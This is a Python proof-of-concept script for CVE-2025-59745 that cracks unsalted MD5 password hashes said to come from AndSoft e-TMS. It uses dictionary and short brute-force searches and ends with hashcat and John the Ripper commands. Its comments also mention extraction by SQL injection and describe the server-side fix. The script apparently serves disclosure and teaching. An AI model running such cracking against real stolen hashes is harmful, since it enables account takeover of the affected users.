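# CVE-2025-59745 PoC: MD5 Password Hash Cracking for AndSoft e-TMS
# This PoC demonstrates how MD5-hashed passwords extracted from AndSoft e-TMS v25.03 can be cracked.
# The script models the stored value as a single, unsalted MD5 of the password, so each guess costs
# one cheap hash and identical passwords share one digest. The corresponding fix is server-side:
# store passwords with a salted, deliberately slow KDF (Argon2id, bcrypt, scrypt or PBKDF2) and
# reset any credential that was ever stored as MD5.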
import hashlib
import itertools
import string
from concurrent.futures import ThreadPoolExecutor
# Sample MD5 hashes standing in for values extracted from an AndSoft e-TMS database.
# (In real scenario, this would be obtained via SQL injection or DB dump)
# Each entry is a lower-case hex digest; the trailing comment names the
# well-known weak password it was computed from, with no salt involved.
sample_hashes = [
    "5d41402abc4b2a76b9719d911017c592",  # MD5("hello")
    "e10adc3949ba59abbe56e057f20f883e",  # MD5("123456")
    "25d55ad283aa400af464c76d713c07ad",  # MD5("12345678")
    "d8578edf8458ce06fbc5bb76a58c5ca4",  # MD5("qwerty")
]
# Common password wordlist (in real scenario, use rockyou.txt or similar)
# Every entry is a widely used weak password; the same kind of list is what a
# password-policy denylist should reject when an account password is set.
common_passwords = [
    "admin", "password", "123456", "12345678",
    "qwerty", "abc123", "monkey", "master",
    "dragon", "login", "hello", "shadow",
    "sunshine", "princess", "football", "charlie",
    "letmein", "welcome", "admin123", "root",
]
def check_password(hash_to_crack, password):
    """Report whether ``password`` hashes to ``hash_to_crack`` under plain MD5.

    The candidate is encoded with ``str.encode()`` (UTF-8 by default) and
    hashed once with no salt, so equal passwords always produce equal digests.
    That property is what makes a stored MD5 value guessable offline; a
    per-user salt with a slow KDF removes it.

    The comparison is an exact string match against ``hexdigest()`` output,
    which is lower-case hex, so an upper-case ``hash_to_crack`` never matches.

    Returns:
        A ``(matched, password)`` tuple, where ``matched`` is True when the
        digests are equal and ``password`` is the candidate passed in.
    """
    candidate_digest = hashlib.md5(password.encode()).hexdigest()
    matched = candidate_digest == hash_to_crack
    return matched, password
def crack_md5_dictionary(target_hash, wordlist):
    """Dictionary attack on MD5 hash.

    Walks ``wordlist`` in order and hands each entry to ``check_password``
    together with ``target_hash``. Progress and any match are printed.

    The search costs one MD5 call per candidate, which is why an unsalted MD5
    of a common password offers no practical protection once the digest leaks.

    Returns:
        The first entry that ``check_password`` reports as matching, or
        ``None`` when the wordlist is exhausted without a match.
    """
    print(f"[*] Attempting dictionary attack on hash: {target_hash}")
    for candidate in wordlist:
        matched, recovered = check_password(target_hash, candidate)
        if not matched:
            continue
        print(f"[+] PASSWORD CRACKED: {recovered} -> {target_hash}")
        return recovered
    return None
def crack_md5_bruteforce(target_hash, max_length=4):
    """Brute force attack on short MD5 hashes.

    Enumerates every string over lower-case ASCII letters and digits, from
    length 1 up to and including ``max_length``, shortest first, and hands
    each one to ``check_password`` together with ``target_hash``. Progress
    and any match are printed.

    The candidate count grows as 36**length, so the search only reaches short
    passwords; passwords using other characters are never generated.

    Returns:
        The first generated string that ``check_password`` reports as
        matching, or ``None`` when the whole space was searched without one.
    """
    print(f"[*] Attempting brute force on hash: {target_hash}")
    alphabet = string.ascii_lowercase + string.digits
    # Lazy generator: candidates are produced one at a time, in the same
    # shortest-first order as nested loops over length and product().
    candidates = (
        "".join(symbols)
        for size in range(1, max_length + 1)
        for symbols in itertools.product(alphabet, repeat=size)
    )
    for candidate in candidates:
        matched, recovered = check_password(target_hash, candidate)
        if matched:
            print(f"[+] PASSWORD CRACKED: {recovered} -> {target_hash}")
            return recovered
    return None
def demonstrate_vulnerability():
    """Run the demonstration over every entry in ``sample_hashes``.

    For each digest the dictionary search over ``common_passwords`` runs
    first; when it returns nothing truthy, the brute-force search is tried
    with ``max_length=4``. The outcome for each digest is printed, followed
    by closing notes.

    Nothing is returned. The point of the output is that unsalted MD5 digests
    of weak passwords are recovered by these two simple searches; the
    remediation is a salted, slow password-hashing scheme on the server and a
    reset of credentials previously stored as MD5.
    """
    banner = "=" * 60
    print(banner)
    print("CVE-2025-59745 - AndSoft e-TMS MD5 Hash Cracking PoC")
    print(banner)

    for target_hash in sample_hashes:
        print(f"\n[*] Target hash: {target_hash}")
        # Dictionary first; `or` only evaluates the brute-force fallback
        # (short passwords) when the dictionary result is falsy.
        recovered = crack_md5_dictionary(
            target_hash, common_passwords
        ) or crack_md5_bruteforce(target_hash, max_length=4)

        if not recovered:
            print(f"[-] Failed to crack hash: {target_hash}")
        else:
            print(f"[+] Successfully cracked: {recovered}")

    closing_notes = (
        "\n[*] Demonstration complete.",
        "[*] In production, use hashcat or john the ripper for faster cracking:",
        " hashcat -m 0 hashes.txt rockyou.txt",
        " john --format=raw-md5 hashes.txt",
    )
    for note in closing_notes:
        print(note)
# Run the demonstration only when executed as a script, so importing this
# module has no side effects beyond defining the names above.
if __name__ == "__main__":
    demonstrate_vulnerability()